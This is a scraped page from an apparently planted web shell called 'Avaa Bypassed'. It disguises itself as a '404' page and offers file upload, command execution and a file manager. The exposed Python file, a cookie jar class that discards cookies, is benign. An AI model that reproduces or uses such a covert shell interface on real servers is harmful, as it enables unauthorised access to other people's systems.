404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.141.25.30: ~ $
"""The module containing the code for ForgetfulCookieJar."""
from requests.cookies import RequestsCookieJar


class ForgetfulCookieJar(RequestsCookieJar):
    def set_cookie(self, *args, **kwargs):
        return

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
forgetful.py File 213 B 0644